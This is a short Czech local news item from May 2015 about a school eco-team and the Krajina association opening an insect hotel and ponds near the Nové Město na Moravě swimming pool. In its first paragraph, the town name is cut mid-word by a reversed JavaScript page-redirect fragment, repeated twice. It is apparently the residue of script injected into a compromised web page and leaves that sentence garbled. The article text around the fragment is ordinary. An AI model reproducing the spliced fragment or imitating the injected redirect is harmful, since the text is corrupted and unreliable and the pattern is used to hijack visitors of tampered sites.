Rainbow page separator

U novoměstského Koupaliště funguje „hmyzí hotel“

Neděle, 24. května 2015

Budování tůní - Hrnečnice

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Otevření „hmyzího hotelu“ se uskuteční u novoměstského Koupaliště. Ten v lokalitě zvané Hrnečnice na konci nové turistické stezky vybudovalo Sdružení Krajina z Počítek a žáci z ekotýmu I. novoměstské základní školy ve spolupráci se Správou Chráněné krajinné oblasti (CHKO) Žďárské vrchy ve Žďáře nad Sázavou. Novoměstští školáci budou v dalších letech sledovat vývoj lokality, kterou mají v oblibě také turisté, a rovněž výskyt obojživelníků ve dvou nových tůních vybudovaných Sdružením Krajina. Projekt finančně podpořily Nadace Partnerství a Nestlé.
„Hmyzí hotel vyrobili a instalovali žáci z ekotýmu v rámci projektu s názvem Přírodní učebna Pod Koupalištěm a nebude jedinou zajímavostí, která v lokalitě bude k vidění. Členové ekotýmu plánují vybudovat také zimoviště pro obojživelníky, vyvěsit budky pro hnízdění ptáků a realizovat další zajímavé a užitečné aktivity, na kterých si v praxi ověří své znalosti,“ informoval Tomáš Blažek ze Sdružení Krajina.
Sdružení Krajina ve spolupráci s CHKO Žďárské vrchy zajistí pravidelnou péči o lokalitu spočívající především v ručním kosení trávy a údržbě tůní.